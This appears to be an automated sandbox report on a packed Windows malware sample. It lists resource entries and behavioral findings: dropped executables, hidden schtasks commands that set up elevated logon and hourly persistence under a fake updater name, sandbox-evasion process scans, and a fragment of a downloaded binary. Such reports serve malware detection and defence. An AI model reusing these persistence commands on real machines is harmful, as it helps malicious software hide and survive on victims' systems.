filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

AFX_DIALOG_LAYOUT

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x0090ee74

size

0x00000002

name

RT_BITMAP

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910560

size

0x00000144

name

RT_BITMAP

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910560

size

0x00000144

name

RT_BITMAP

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910560

size

0x00000144

name

RT_BITMAP

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910560

size

0x00000144

name

RT_MENU

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910998

size

0x00000308

name

RT_MENU

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x00910998

size

0x00000308

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

name

RT_DIALOG

language

LANG_KOREAN

filetype

empty

sublanguage

SUBLANG_KOREAN

offset

0x009145a4

size

0x00000034

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\KZnHsyJhX9IFJQyjXOyq.exe
file	C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe

Creates a suspicious process (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\KZnHsyJhX9IFJQyjXOyq.exe
file	C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\heidipc1B682np29P\nKr51DmJ1Ent7SAqXPmZ.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW March 29, 2024, 7:43 a.m.	thread_identifier: 2808 thread_handle: 0x00000584 process_identifier: 2804 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000588	1	1
CreateProcessInternalW March 29, 2024, 7:43 a.m.	thread_identifier: 2868 thread_handle: 0x00000590 process_identifier: 2864 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000058c	1	1
CreateProcessInternalW March 29, 2024, 7:43 a.m.	thread_identifier: 2932 thread_handle: 0x000005a8 process_identifier: 2928 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x0000062c	1	1
CreateProcessInternalW March 29, 2024, 7:43 a.m.	thread_identifier: 2992 thread_handle: 0x0000061c process_identifier: 2988 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000630	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (3 events)

Time & API	Arguments	Status	Return
Process32NextW March 29, 2024, 7:43 a.m.	snapshot_handle: 0x0000043c process_name: mobsync.exe process_identifier: 2280	1	1
Process32NextW March 29, 2024, 7:43 a.m.	snapshot_handle: 0x0000043c process_name: taskhost.exe process_identifier: 2372	1	1
Process32NextW March 29, 2024, 7:43 a.m.	snapshot_handle: 0x0000043c process_name: getimage15.php process_identifier: 2548	1	1

An executable file was downloaded by the process getimage15.php (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile March 29, 2024, 7:43 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELx²fàlÞ @ à`K PvNÀ@ H.textäj l `.rsrcP n@@.relocÀt@BÀH¤wdqé0 þ8þEyÆPÕ8t~°( è s ~±(þ ~h{¬9ÿÿÿ& 8ÿÿÿ~9{ ~h{w:uÿÿÿ& 8jÿÿÿrps zþ ~²(~³( ?Ýÿÿÿ ~h{«:(ÿÿÿ& 8ÿÿÿ8¹ÿÿÿ 8ÿÿÿ 8þþÿÿ(Nþ þ þ (>þ þ (&~þ~(]0 Oþ8þEYYew@ÞO$Ã&¦ ÿÏ«Ñ"PþÁÉ ÷ãnEÔ3< iU¯Z ¶½N ÎFôñNÁ\Ú Nyrú[a188¼ ðV-ë * éø ÀtáÈï8T L8~þÿÿ << þ8`þÿÿo 8Rþÿÿ ? %8<þÿÿ8F 9~h{d9#þÿÿ& E8þÿÿi N8 þÿÿ þ8ôýÿÿ $~h{:áýÿÿ& >8Öýÿÿ <8Èýÿÿo 8¶ýÿÿX 8¦ýÿÿ8Ø (~h{Y9ýÿÿ& $8ýÿÿX ] ~h{u:býÿÿ& 8WýÿÿX 8Gýÿÿ8© ~h{n:.ýÿÿ& 88#ýÿÿLo ~h{:ýÿÿ& 8ûüÿÿ ? %~h{L:ßüÿÿ& -8Ôüÿÿo Yo 8~h{_:®üÿÿ& W8£üÿÿ9 @~h{9üÿÿ& !8}üÿÿrêp~·(@Åÿÿÿ ~h{o:Tüÿÿ& 8Iüÿÿ85 &þ82üÿÿ 8)üÿÿX ] H8üÿÿX T8ûûÿÿ ô;V þ8Ýûÿÿ request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00522800', u'virtual_address': u'0x003e8000', u'entropy': 7.992227428472316, u'name': u'.vmp\\xc2\\xa4\\xc2\\xbb', u'virtual_size': u'0x00522650'}

entropy

7.99222742847

description

A section with a high entropy has been found

entropy

0.996871741397

description

Overall entropy of this PE file is high

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000043c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000440 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000440 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x00000444 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x00000450 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA March 29, 2024, 7:43 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x00000458 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e1e25c1f1e865a2123cc2614a754c5ee HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_ff2364a0be3d20e46cc69efb36afe9a5 HR" /sc HOURLY /rl HIGHEST
